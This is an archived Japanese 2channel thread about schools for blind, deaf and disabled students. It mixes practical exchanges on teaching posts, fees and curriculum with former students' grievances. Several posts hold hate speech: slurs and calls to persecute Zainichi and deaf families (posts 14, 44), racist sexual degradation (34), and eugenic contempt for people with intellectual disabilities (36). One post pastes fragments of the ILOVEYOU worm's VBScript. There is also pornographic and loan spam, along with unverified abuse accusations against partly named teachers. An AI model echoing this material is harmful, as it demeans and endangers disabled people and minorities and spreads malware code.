2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

盲・聾・養護学校を語りましょう

1 :1:03/05/05 00:20 ID:254y8zBE
生徒、教職員、保護者の方。何でも語ってください。
ちなみに私は、養護学校の常勤講師です。

2 :バリアフリーな名無しさん:03/05/05 00:27 ID:bKXbruGO
まずは1が語ってください。とりあえず・・・
「☆養護学校の教員です」
http://mentai.2ch.net/volunteer/kako/1000/10009/1000905163.html
を人通り読んでの感想でも語ってください。

3 :バリアフリーな名無しさん:03/05/05 21:36 ID:0m+UDb70
常勤講師ってどうやってなるの

4 :バリアフリーな名無しさん:03/05/05 22:50 ID:uH4H5NkJ
>>2

私は、まだまだぺーぺーなんで語れないです。
人任せにしてしまいました。そのうちこのスレ、
消滅してしまいますね。

>>3

都道府県教育委員会に「養護学校の常勤講師になりたいです!」と
市販履歴書or指定の希望書を提出します。

養護学校は、教員の数が多く、病休や産休に入る
人も多いので、年度途中の定数外常勤なら、
結構仕事の話はあります。

詳しくは、↓
http://school.2ch.net/test/read.cgi/edu/1049467178/

5 :バリアフリーな名無しさん:03/05/10 18:36 ID:w2vL/0Ir
養護卒業して数年たちました。
しかし普通中⇒養護に行った傷跡は
いやされません。先生は甘い汁を吸わせ
守るっていう感じしか見受けられなく、
進路先は授産施設若しくは障害者福祉工場という前提しか見受けられなく
そして高等部の中で
エリートコースと遊びコースに自動的にされてそしてエリートと下部の上下関係が
私には辛く感じた。そして
旧友の仲間たちにもね養護学校という高校とちがうという
偏見で3年間見られ空白が埋められない
昔友達だった人がこの前であったときに「むこういけ」っていわれちゃって怖くて
なんか障害者と健常者というなんか大きいハードル感じちゃった(笑)
こんな思いをしつけなのは健常者の一人である養護教師
私は養護を批判してこれからも私のような不道徳されないよう
インターネットで書き込みしていくそして訴えられても
心身に与えられた苦痛そして高校三年間の青春を
賠償請求したい私の心の中はギタギタに
今なり、誰も信じられない養護からの
手紙が来るたび腹正しいあんな学校
普通中⇒養護ということはあってはならない
あっても遊びコース≪小学レベル≫には
行ってはいけない。私は今一般企業で
就労していて養護から見学とか噂聞くと
【有給】をとる覚悟

在学中の保護者の皆様には誠に申し訳ありませんが
こんな考えの障害者もいることもご理解してください


盲・ろう・養護学校 反対

6 :バリアフリーな名無しさん:03/05/10 19:24 ID:VIdyiQ3u
不良品収容所なぞ潰してしまえよ
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


7 :一番:03/05/10 19:29 ID:5qEwCqU4
なぞの世界でしたが、
山本おさむさん(だったかな?)の書いた
「わが指のオーケストラ」
「だんぐりの家」
は、結構リアルで勉強になりました。
障害児教育に興味ある人もない人も是非一度読むことを
お勧めします。


8 :バリアフリーな名無しさん:03/05/11 21:36 ID:PAb4NQIh
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 p
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 p
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 
養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 養護批判 
養護批判 

さあ俺を殺してくれ さあ・・・・・・さあ

9 :山崎渉:03/05/20 04:12 ID:kpDVO6XL
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

10 :山崎渉:03/05/21 21:42 ID:CpZpEZhE
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

11 :山崎渉:03/05/21 22:45 ID:CpZpEZhE
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

12 :山崎渉:03/05/28 14:22 ID:B7SFtnK9
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

13 :バリアフリーな名無しさん:03/06/02 01:19 ID:PcoAus4X
あげ

14 :被害者の純粋日本聴覚障害者:03/06/02 08:55 ID:AJtmDpxw
昔、聾学校に保護者がドキュソ在日出身で子供を生まれて来た池沼や、ドキュソつんぼや、基地害人格障害
マジだよ。人類の為に非常識なドキュソ在日老夫婦たちへ生き地獄のような迫害して欲しいだもん。
左翼のゴキブリ蠅クソ狂師たちめ、ドキュソ嘘つき上手いつんぼ生徒の味方しやがって、いつか、死後地獄へ苦しめばいいさ!

15 :バリアフリーな名無しさん:03/06/02 22:49 ID:bPxmrHpE
特別支援教育について語ろうぜ.

16 :七夕によく行く人:03/06/03 12:23 ID:SdmnV3FT
>>5
 やっぱりあるんだ。一般企業という意識なさ過ぎ。
 ただ、盲とか聾だとまだお遊び感覚の部分が少ないと思われ。現に、そっちは
就職率高いらしいし。
>14
 ヴぉけ。左翼は問題だけど、こう書くと日本人が悪いと思われ

17 :バリアフリーな名無しさん:03/06/05 22:39 ID:dIGNHteQ
あげ

18 :マジレスお願い:03/06/05 23:17 ID:xtSg4ZAc
ろうあ者 と

難聴者

の違いを教えてください。
よろしくお願いします。

19 :七夕によく行く人:03/06/10 16:52 ID:dGGJOyZL
>>18
 調べろ。
 この板の住人に特殊教育諸学校及び75条学級関係者はいないのか。

20 :バリアフリーな名無しさん:03/06/19 17:27 ID:hKs4NhJz
某国立養護学校の生徒やってるけどさ、なんていうか・・・どれも中途半波って感じがする。
ウチは他の養護学校に比べて勉強に重点を置いてるから勉強時間は多いんだけどそれでもやっぱり普通校に比べると少ない
じゃあ動作訓練のほうはどうなんだと聞くとこれは他の学校に比べると圧倒的に少ない
結局どっちつかずな教育だから進路だって曖昧だし・・・
これが有名養護学校なのかと思うと少し悲しい

21 :バリアフリーな名無しさん:03/06/21 22:47 ID:A01jQ9HQ
>>20
それはしょうがない問題.
普通学級の各教科+特活+総合的な学習の時間(+道徳)に加えて,特殊学校の場合は自立活動を含めなければいけない.
どっちに転んでも,時間数が制限されてしまう.

22 :バリアフリーな名無しさん:03/06/23 23:49 ID:Aj5Rwzth
あげ

23 :20:03/06/26 18:20 ID:RRcvG8ZB
>>21 なら中途半波なことをせずにいっそのこと自立活動の時間を増やせと主張したいのですよ。
そうすれば勉強を重視したい人ははっきりと普通校に行けるんだし

24 :バリアフリーな名無しさん:03/06/26 20:16 ID:7oKbJ8Mw
超過激&超かわいいイエローキャブのライブチャット登場!!

あなたの命令で若い娘たちがヌレヌレモード&イクイクモード

☆★ アメリカ西海岸発 ☆★ 当然 モザイクありません ☆★

あなたの言葉で「若い娘」を・・・ヌードにさせてくださいmase

あなたの指で「イエローキャブ」を・・感じさせてくださいmase

あなたの声で「GAL」を・・・イ・カ・セ・テ・くださいmase

寂しがりやの留学生の若い娘がお待ちしております!

恥ずかしがりやだけどオナニー好きの娘や

男のシンボルダイスキでバイブ好きの娘たちが

あなたのチャットをお待ちしております!!

日本人留学生のハレンチな「性」を覗いてみてくださいmase

チャット・セフレをお探しのあなた!今すぐ! Let's Live!

☆★10分間無料で体験できるほか7日間会費無料でございます...

http://www.gals-cafe.com

25 :バリアフリーな名無しさん:03/06/27 21:51 ID:TYA9apmu
もうすぐ「養護学校」は無くなり、「特別支援教育」が始まりますね。
センター的機能を生かすってことで、ウチの学校でも、出張教室
始まっています。平たく言えば「ノーマライゼーション」を推進する
方向かつ、ADHDとかアスペルガーの人に手当てを・・・という方向。
コーディネーターなる専門家を置き、従来の養護学校を人材派遣
機能として活用しようというわけです。
人的資源の分散という意味では諸刃の剣なわけで。

ううむ、徒弟研修ができるって意味では「養護学校」があることが
ありがたいのですがな。普通学校の40人学級廃止して20人学
級にしてくれれば、教師も普通学校生徒も特殊教育対象者もウマー
なのになあ。

26 :バリアフリーな名無しさん:03/06/27 23:36 ID:mCgUjHgp
>>25
でも,特別支援教育の最大目的は,ずばり経費削減!!だろ.
どれだけ,現場にしわ寄せが来ることやら.

27 :バリアフリーな名無しさん:03/06/28 18:08 ID:kq8x2rBi
まったくです。
金金金かね・・・・すべて金で制限されること多いですわ。
盲聾病弱等集めて一個の施設を使いまわす計画が出ていて、
ずばり「経費節減」といわれますた。
うーむ。まあ、いいけどさ。

28 :バリアフリーな名無しさん:03/06/30 15:13 ID:apXRAM8E
来年、息子が養護の小学部にはいるかもしれません
県立養護学校って月謝はおいくらなんでしょうか?
(変な話で申し訳ないです)
遠方の療育施設に通っているので、これ以上出費が増えると
かなりきついんです。。。
荒らしや煽りじゃないんで、レスをお願い致します


29 :28:03/06/30 15:16 ID:apXRAM8E
し、しつれいしました
下げ忘れてしまいました
これじゃ荒らしや煽りじゃないといっても
信用してくださいませんよね。。。
申し訳ございません。。。。

30 :YUIS:03/06/30 15:53 ID:tPvp6qAc
800円〜!?なんでこんなに安いんだ!?

http://www.dvd-yuis.com/

31 :バリアフリーな名無しさん:03/07/01 00:19 ID:JG5D8I8W
>28さんへ
「就学奨励費」という制度がありますよ。文房具や修学旅行費を援助する
公的なお金です。
普通の小学校よりお金がかからない場合があります。
知的な遅れが軽度で、経済的に苦しい家庭のお子さんが、
普通校でなく養護学校を選択していたケースも見てきました。
もし、学校に通学するのが難しいような遠方の場合、寄宿舎の費用は安いです。
ただ、車椅子や補聴器のように機材にお金がかかる場合もありますね・・・。
一概には言えないのです。


32 :山崎 渉:03/07/12 11:25 ID:Ohan4Ls1

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

33 :山崎 渉:03/07/15 13:11 ID:Jpz4bCg5

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

34 :なまえをいれてください:03/07/21 14:19 ID:9KkwzRhR
ハッキリ言ってアメリカなどの多民族国家では黒人の方がアジア人よりもずっと立場は上だよ。
貧弱で弱弱しく、アグレッシブさに欠け、醜いアジア人は黒人のストレス解消のいい的。
黒人は有名スポーツ選手、ミュージシャンを多数輩出してるし、アジア人はかなり彼らに見下されている。
(黒人は白人には頭があがらないため日系料理天などの日本人店員相手に威張り散らしてストレス解消する。
また、日本女はすぐヤラせてくれる肉便器としてとおっている。
「○ドルでどうだ?(俺を買え)」と逆売春を持ちかける黒人男性も多い。)
彼らの見ていないところでこそこそ陰口しか叩けない日本人は滑稽。

35 :バリアフリーな名無しさん:03/07/24 15:15 ID:wZ2ULrxH
アナタら、これどう思うよ。

過激な性教育教材展示-都議会
性器付いた人形など24点 
都立七生養護学校から押収

ttp://www.worldtimes.co.jp/wtop/education/030724/030724.html

こういう歪んだ教育してるとこが多いみたいだけど。
だからか? 知的障害者が性犯罪じみた振舞いに出ることが往々にしてあるのは。

36 :バリアフリーな名無しさん:03/07/25 12:53 ID:4R4prFdY

501 名前:名無しさん@4周年 投稿日:03/07/25 12:45 ID:hskYoYQI
そもそも、養護学校で性教育をする必要があるのかどうか。
こいつらにガキ作る資格があるのかどうか。
作ったとして生まれたとして、誰が育てるのだ。
自分の面倒も見られないような人間が子供を作って良いのか。

つか、こういうシステムだけを教える教育をするから、
欲望を抑えることを知らない池沼が
本能のまま性行為を他人に押し付けてくるのではないか。
池沼の性犯罪じみた行動の原因の一端はコレだな。

502 名前:名無しさん@4周年 投稿日:03/07/25 12:51 ID:hskYoYQI
こういうシステムで子供ができる、おまえらの体の変化の理由はこれだ、
ということを教えるのもイイが、同時に
「合意」が無いならやってはならないってことも教えろよ。
そうでなければ池沼は発情した動物と同じ行動をするだろうよ。
こういう教育じゃ、池沼の性に対する罪悪感を払拭して
本能のままに行動することを正当化するだけだろうがよ。

つうか、SEXの行為だけを取りだして、
全人的に他人を愛することを教えない性教育って意味あるのか。
しかも池沼に。



37 :バリアフリーな名無しさん:03/07/25 13:46 ID:JOpWwVZ7
◇◇ 一週間無利息・キャッシング ◇◇

ご融資の際の審査は、勤務先・ご家族の方に
知られない様に絶対に秘密で行います。

申し込み時に勤務先の電話番号は
ご自分の携帯番号でもけっこうです。
      http://www.am1960.com/
携帯から http://www.am1960.com/i/


38 :GET! DVD:03/07/25 13:48 ID:vkwVyfHm
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
☆★ 送料激安!  スピード発送!  商品豊富!   
★☆      http://www.get-dvd.com        
☆★ 激安DVDショップ 「GETDVDドットコム」 
★☆      http://www.get-dvd.com        
☆★ 今すぐアクセス Let’s Go!   急げ! 
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★

39 :バリアフリーな名無しさん:03/07/25 14:40 ID:g5n+mud8
ど う し て こ の 国 は こ ん な に

風 俗 で は た ら い て い る ひ と が

大 量 に い る ん で し ょ う か ?

40 :バリアフリーな名無しさん:03/07/28 21:53 ID:rMbwqcDG
たいへんだなあ.


41 :バリアフリーな名無しさん:03/07/31 20:30 ID:qFyQ+IDw
age玉ボンバー

42 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 02:45 ID:24qWgchf
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

43 :バリアフリーな名無しさん:03/08/11 20:57 ID:SsyiAqbj
a

44 :匿名仮面ヒッキー:03/08/12 14:45 ID:VnWTFHtz
昔、ろう学校の生徒たちの親たちがかなりドキュソ率の高め! 在日や部落も含めて、問題児であるろうあが見ても 親の写し鏡です。 だから、ろうあが産んだ親たちへ迫害してもいいです。 皆様協力しお願いします。

45 :山崎 渉:03/08/15 16:55 ID:cn1sGc3X
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

46 :中にはこんな校長&教師もいる:03/09/13 10:53 ID:dKZImKli
<都立村山養護学校>「復帰」の教諭 再び職員室研修
 東京都武蔵村山市の都立村山養護学校で11日、職員室での研修を受けていた男性教諭の「職場復帰」に抗議して
全生徒の約半数の61人の生徒が欠席した問題で、同校は同日夕、再びこの男性教諭を職員室研修に戻すことを決めた。
同校の高橋光夫校長は「教室に戻すにはまだ不可能な要素があった」と話している。
 この教諭は昨年9月、調理の授業中に高校2年だった男子生徒の唇にワインを塗ったなどとして、保護者側が学校側に抗議。
高橋校長が教諭に今年1月から職員室で研修を命じる措置を取っていたが、11日から「参観」という形で「職場復帰」させた。
http://news5.2ch.net/test/read.cgi/newsplus/1063266477/


47 :バリアフリーな名無しさん:03/09/14 09:43 ID:dD5I9iJh
208 :名無しさん@4周年 :03/09/14 00:16 ID:ygUhlOz8
問題教師の名は『N里徹』!!
新聞に載ってる事はほんの一部であって新聞にも書けない様な事をしていた!!
N里以外にも取り巻きが3人いた!!
教育委員会は何をしている!!


48 :バリアフリーな名無しさん:03/09/14 23:35 ID:87LywI1/
211 :名無しさん@4周年 :03/09/14 10:50 ID:ygUhlOz8
>>209
N里と一緒になり面白がって生徒を虐めてたガキみたいなアホ教師が他にも3人いました。
N里が休みのときにN里に代わり虐めを代行してた超ドアホな税金泥棒が3人もいました。
その3人の税金泥棒は今でも普通に教壇に立ってます。
校長、N里、そして取り巻きの3人をクビに出来る機関は無いのかな?

49 :バリアフリーな名無しさん:03/10/23 15:44 ID:1kVA5Vn8
くくりがあまりにおおざっぱ過ぎないか?
盲も聾も各種養護もいっしょくたに語ろうなんて、DQNな教育委員じゃないんだからさあ。

50 : ◆Go1993HR5w :04/02/10 21:32 ID:ZsMmFkAP
ぐyk

51 :バリアフリーな名無しさん:04/03/10 02:17 ID:XDPAPpZ6
test

52 :電脳プリオン:04/03/18 09:24 ID:KOx45681
不人気スレ救済?

53 :バリアフリーな名無しさん:04/04/01 19:43 ID:Ah1euU72
aaaaaageeeeee!

54 :盛岡聾学校OB:04/04/14 13:01 ID:g8wTHqlE
20年前のことですが、キモイロリ高校教師どもの犯罪暴露したい。こいつらは校舎の女子更衣室や、寄宿舎の女子脱衣場に密か盗撮したんだよ。
O田先生と鈴木先生と他の先生が若い女生徒の裸体を見定め話題していた!



55 :バリアフリーな名無しさん:04/04/14 15:14 ID:g8wTHqlE
昭和中期後時代の盛岡聾学校に必ず問題教師だけにいい心地よい時代だそうなあ。暴力常習犯とか、ロリ限定のセクハラ常習犯とか、飲酒運転常習犯とか、ヒス欲求不満女教師とか、当時の屑のような教師が採用してくれたのは異常な時代だった。


56 :バリアフリーな名無しさん:04/04/14 15:27 ID:g8wTHqlE
昭和半ばの頃は普通校も異常な時代だよ。暴力教室とか、ヤンキー生徒が多かったらしい。当時の教育委員会は一体なにをしたか?

57 :バリアフリーな名無しさん:04/04/23 22:05 ID:NT3uZ3/D
■□■ 店頭にてすぐにご融資 ■□■

新規のお客様は、ご来店が必要になりますが
店頭にて50万円まで20分でご融資。

月1回払い・お利息だけでも大丈夫です。
金利はきちんと法定金利内でのご融資です。
最大6ヶ月据え置きの失業救済制度も導入。

http://www.bazooka.ne.jp/~a3503


58 : :04/04/24 23:43 ID:nawszv7Q
http://www.toyohashi-sh.aichi-c.ed.jp/

59 :バリアフリーな名無しさん:04/04/26 01:06 ID:PsEoWaf+
養護学校(中高)の音楽の時間ってどんなことするんですか?

60 :バリアフリーな名無しさん:04/04/29 15:54 ID:ij7Hsl/8
>>59
なんか漠然とした質問ですが・・・

楽器を使って体を動かす練習をしたり
リズムにあわせて体を動かしたり
音楽を聴くことで精神を安定させることを学習したり
とかいろいろです。
高校とはいっても知的障害のある学級の場合は
健常児の幼稚園や小学校のプログラムみたいのを組むこともあったりします。

61 :バリアフリーな名無しさん:04/06/06 19:51 ID:gMfDB+1w
養護学校は皆様の考えているより孤立化されている教育国といっても過言ではありません
回りから遮断し、普通高校の教育もできない教師が校長を先頭に多々おり、障害者介護という名目化で教育単位を与えています。
わたしは養護学校=刑務所 教師にとっては指導力低下されかつ問題から逃げた負け教師の墓場です
養護学校は障害者教育の場と考えられていますがそれは違うと思います。
かつ私の収容されていた養護学校は七五三体制が横行されています
7年間 同校の部主事
5年間 他校の教頭
3年間<退職前> 同校の校長と
暗黙了解の上横滑りされています。障害者は福祉施設や工場に受け皿探し本来の教育を一つもしない。こんな体制は許せません
今すぐ現校長の不信任し民間からの校長を強く望みます。
http://www.toyohashi-sh.aichi-c.ed.jp/

私は養護学校で障害者というレッテル貼られ
地元の友だちとは養護学校問題の一つの汚点により亀裂が走り修復困難です養護学校に親友を殺されました
わたしはこうして訴えるしか方法はありません。
私は養護学校改革がなされるなら社会的地位や何もいりません。殺されてみても覚悟の上でこうして養護学校批判をしています。
本当は養護学校に慰謝料支払請求したいのですが法上難しいから逆にこうして養護学校批判していきていきたいです
だからこれから養護学校考えている生徒さん、保護者の方へは養護学校には何もメリットありません
−になるだけです。親友・教育・社会からの遮断等
わたしは刑務所暮らしと三年間を思ってますから


62 :バリアフリーな名無しさん:04/06/09 10:59 ID:0UalCUrq
とりあえず手短にまとめてください

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)